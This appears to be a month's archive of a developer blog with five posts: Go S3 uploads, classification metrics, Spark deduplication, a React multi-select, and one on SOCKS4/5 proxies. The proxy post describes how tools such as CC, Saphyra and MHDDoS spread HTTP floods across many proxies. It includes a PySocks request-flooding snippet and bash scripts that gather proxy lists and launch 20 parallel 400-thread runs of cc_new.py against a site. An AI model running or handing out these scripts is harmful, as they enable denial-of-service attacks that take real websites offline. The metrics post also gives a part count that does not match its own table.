run KISS: May 2022

Monday, May 30, 2022

Upload File to AWS S3 in Go

In this post we will review how to upload a file to AWS S3 in Go.

First we create an AWS session. We can use one of the methods specified in this post, but in this case we need to support different AWS session/credentials for each upload, hence we statically supply the AWS session configuration.

import (
   "context"
   "github.com/aws/aws-sdk-go/aws"
   "github.com/aws/aws-sdk-go/aws/credentials"
   "github.com/aws/aws-sdk-go/aws/session"
   "github.com/aws/aws-sdk-go/service/s3/s3manager"
   "strings"
)

func uploadFile() {
   region := "us-east-1"
   accessKey := "AKIAWXXXXXXXXXXXRQWU"
   secretKey := "XXXXKsqJ2inJdxBdXXXXDE0jX+gxxFXXXXRVXX"

   config := aws.Config{
      Region:      aws.String(region),
      Credentials: credentials.NewStaticCredentials(accessKey, secretKey, ""),
   }
   awsSession, err := session.NewSession(&config)
   if err != nil {
      panic(err)
   }

Next we upload the file using S3 manager. The path in bucket can includes folders, and there is no need to create any sub folders, as the S3 does not actually keeps folders, instead it is a key-value implementation, and the folders are only used in the AWS console GUI presentation of the folders files.

   bucketName := "my-bucket"
   keyInBucket := "folder1/my-file.txt"
   fileContent := "this is my data"

   uploader := s3manager.NewUploader(awsSession)

   input := &s3manager.UploadInput{
      Bucket:      aws.String(bucketName),
      Key:         aws.String(keyInBucket),
      Body:        strings.NewReader(fileContent),
      ContentType: aws.String("text/plain"),
   }
   _, err = uploader.UploadWithContext(context.Background(), input)
   if err != nil {
      panic(err)
   }
}

Monday, May 23, 2022

Classification Algorithm Performance Metrics

In this post we will review metrics for measuring results a a classification algorithm result.

For the purpose of this, let assume we had run a classification algorithm to classify damaged parts by examining a picture of each part.

We've had run the algorithm over 10,000 parts, and then algorithm had detected 170 damaged parts. This information by itself provide zero visibility to the performance of the algorithm. To analyze this result, we need to start with a confusion matrix.

	Predicted: Valid	Predicted: Damaged
Actual: Valid	800	40
Actual: Damaged	30	130

The confusion metrics inspects two aspects for each part:

What is the actual part status: Valid or Damaged
What is the algorithm classification: Valid or Damaged.

To speak the same language regardless of the data domain, we use the terms True/False and Positive/Negative.

True - means the algorithm classification is correct
False - means the algorithm classification is wrong
Positive - means the algorithm marked the part as damaged
Negative - means the algorithm marked the part as valid

Notice that Positive/Negative can be defined vice versa, depending on the definition of the algorithm purpose. In this case we have defined the algorithm purpose as: "to classify damaged parts", hence We treat Positive as classification of a part as damaged.

We can rewrite the confusion matrix using these terms:

	Prediction: False	Prediction: True
Actual: False	True Negative = 800	False Positive = 40
Actual: True	False Negative = 30	True Positive = 130

And so, the terms are:

True Negative - correct detection as a valid part
True Positive - correct detection as a damaged part
False Negative - wrong detection of a damaged part as a valid part
False Positive - wrong detection of a valid part as a damaged part

To estimate the performance, we can use several more metrics, that are based on the confusion matrix.

Precision = TP / (TP+FP)

In other words, the precision specifies the correctness in case a part is detected as damaged.

Recall = TP / (TP+FN)

In other words, the recall specifies the correctness in case a part actual state is damaged.

And, last, we can use a metric to combine the Precision (P) and Recall (R).

F1 Score = 2PR/(P+R)

The F1 Score ranges between 0-1, where 1 means a perfect classifier.

Let's examine our classifier metrics:

Precision = 130 / (130+40) = 0.765

Recall = 130 / (130+30) = 0.812

F1 Score = 0.788

Monday, May 16, 2022

Spark Parallelism Use Case Analysis

In this post we will review a use case of performance improvement in a spark cluster.

The spark cluster was used to get JSON objects from many files located in S3.

However, due to a bug in the application creating the files, we've had to remove duplicate JSON objects.

The original implementation used the following code:

# RDD of all JSON objects
rdd = load_all_json_files_from_s3()
# convert (JSON) to (string_of_JSON,JSON)
rdd = rdd.map(lambda x: (str(x), x))
# remove duplicates by the string_of_JSON
rdd = rdd.reduceByKey(lambda x, _: x, 10)
# get back just the objects
rdd = rdd.map(lambda x: x[1])

The problem in this case is that the reduceByKey method needs to compare any object with all other objects, hence the cost is very high. In addition, this implementation totally ignored the fact that the JSON object includes timestamp, which can assist in better partitioning.

To fix this, we've updated the implementation to the following:

partitions_count = 100

def get_partition_by_time(transaction_time):
    minutes_since_midnight = transaction_time.hour * 60 + transaction_time.minute
    partition = minutes_since_midnight % partitions_count
    return partition


# RDD of all JSON objects
rdd = load_all_json_files_from_s3()
# convert RDD: transaction_json_object -> RDD: (time,transaction_json_object)
rdd = rdd.map(lambda t: (t['timestamp'], t))


# re-partition according to the time of the transaction
rdd = rdd.partitionBy(partitions_count, get_partition_by_time)

# convert RDD: (time,transaction_json_object) -> RDD: ((time,transaction_json_string), transaction_json_object)
rdd = rdd.map(lambda t: ((t[0], str(t[1])), t[1]))

# reduce by the key tuple to prevent duplicates
rdd = rdd.reduceByKey(lambda t1, t2: t1,
                      partitions_count,
                      lambda key: get_partition_by_time(key[0]))

# convert RDD: ((time,transaction_json_string), transaction_json_object) -> RDD: transaction_json_object
rdd = rdd.map(lambda t: t[1])

Notice that we use the timestamp, which is part of the key, not only to ease the amount of objects to compare with, but also to determine the related partition where this object will be handled, hence, all the de-duplication work will be done in the same partition.

After this change, the run time of the application reduced from 4 hours to 20 minutes. This is a great example of how being aware to the actual work done by each partition is critical to get a good performance from the spark cluster.

Monday, May 9, 2022

Using Sock4/5 HTTP Proxies

In this post we will review usage of sock4 and sock5 HTTP proxies, and some open source tools that are utilizing them.

These proxies, also referred as anonymous proxies, serve as intermediates which send an HTTP request to a target web server as requested by a client. Some of these proxies are available only for paying customers, but there are also some free proxies. Check out the site https://www.socks-proxy.net for a list of some of these servers.

The proxies can be used to hide a client IP, but they are also used to summon a DDoS attack on a web site. The capability to attack a web site from multiple source IP makes it difficult to protect the web site. Unlike an attack from a single source IP, which can be simply blocked upon detection of the attacking party, each of these proxies has it own IP, and hence blocking of a single IP or even detection of the attack is harder.

No only that, but also some tools, such as CC Tool, Saphyra, and MHDDoS, are globally available open source tools, that not only use multiple sock4/sock5 proxies, but also randomize the HTTP requests including the HTTP headers, the HTTP URL, and the HTTP cookies. Hence it is not only multiple attacking IPs, but also multiple requests formats, which it hard to identify.

Let examine, for example, the CC tool. It starts by downloading list of sock4 or sock5 proxy servers, and then validates the connection to them. Then, it uses only the proxy servers that were successfully validated, and starts multiple threads to send HTTP requests. Each thread randomly selects one of the proxy servers, and sends multiple requests to the server. The requests include random URL suffix, and random headers out of a static list of predefined headers.

The socks4 and socks5 support is included in PySocks library, and a simple usage is as follows:

import socks
s = socks.socksocket()
if proxy_type == 4:
    s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if proxy_type == 5:
    s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if brute:
    s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.settimeout(3)
s.connect((str(target), int(port)))
if protocol == "https":
    ctx = ssl.SSLContext()
    s = ctx.wrap_socket(s, server_hostname=target)
get_host = "GET " + path + add + randomurl() + " HTTP/1.1\r\nHost: " + target + "\r\n"
request = get_host + header
sent = s.send(str.encode(request))
if not sent:
    break
s.close()

Some tools reuse the same socket, and send multiple GET/POST requests on the same socket, without waiting for response. This multiplies the affect of the attack, especially if not protection/validation method is used on the server side.

To run the CC tool, we first run it to create a list of proxies to use, for example:

#!/bin/bash

set -x
VERSION=$1

python3 cc_new.py -down  -mode cc -v ${VERSION} -f socks${VERSION}_download_all.txt
sort socks${VERSION}_download_all.txt | uniq -u > socks${VERSION}_download_unique.txt
wc -l socks${VERSION}_download_unique.txt
cp socks${VERSION}_download_unique.txt socks${VERSION}.txt
python3 cc_new.py -check -mode cc -v ${VERSION} -f socks${VERSION}.txt
wc -l socks${VERSION}.txt

Then, we can run the DDoS using:

#!/bin/bash

set -x
VERSION=$1
METHOD=$2

ulimit -n 999999
for i in {1..20}; do python3 cc_new.py -url http://my-site.com -m ${METHOD} -v ${VERSION} -f socks${VERSION}.txt -s 600 -t 400& done

Monday, May 2, 2022

Multi-Selection List in React

In this post we will implement a simple multi-selection list in react.

We start with the component configuration. The name of the component is GuiMultiSelect.

import styles from './component.module.css'

function GuiMultiSelect(props) {
  const {selected, options, onChange, label} = props

The multi-selection receives the following properties:

options - strings list of the possible values
selected - strings list of the selected values
label - the label to add for the list
onChange - callback to invoke upon selection change

The rendering of the component includes the label, and the select element, which includes list of the options.

  return (
    <div>
      <div className={styles.label}>
        {label}
      </div>
      <select
        multiple={true}
        className={styles.select}
        size={20}
        onChange={handleChange}
      >
        {items}
      </select>
    </div>
  )
}

export default GuiMultiSelect

The options rendering uses the values from the options property, and set the selected attribute.

const items = []
options.forEach(option => {
  items.push(
    <option
      key={option}
      value={option}
      selected={selected.includes(option)}
    >
      {option}
    </option>,
  )
})

The onChange will get the updated status for each option, and send a new strings list of the selected values.

function handleChange(event) {
  const newSelected = []
  const items = event.target.getElementsByTagName('option')
  for (let i = 0; i < items.length; i++) {
    const option = items[i]
    if (option.selected) {
      newSelected.push(option.value)
    }
  }
  onChange(newSelected)
}

In addition, we add styling for the elements.

component.module.css

.select {
    width: 500px;
    font-size: 20px;
    margin-left: 20px;
}

.label{
    padding: 25px;
}

The full code is below.

component.js

import styles from './component.module.css'

function GuiMultiSelect(props) {
  const {selected, options, onChange, label} = props

  function handleChange(event) {
    const newSelected = []
    const items = event.target.getElementsByTagName('option')
    for (let i = 0; i < items.length; i++) {
      const option = items[i]
      if (option.selected) {
        newSelected.push(option.value)
      }
    }
    onChange(newSelected)
  }

  const items = []
  options.forEach(option => {
    items.push(
      <option
        key={option}
        value={option}
        selected={selected.includes(option)}
      >
        {option}
      </option>,
    )
  })

  return (
    <div>
      <div className={styles.label}>
        {label}
      </div>
      <select
        multiple={true}
        className={styles.select}
        size={20}
        onChange={handleChange}
      >
        {items}
      </select>
    </div>
  )
}

export default GuiMultiSelect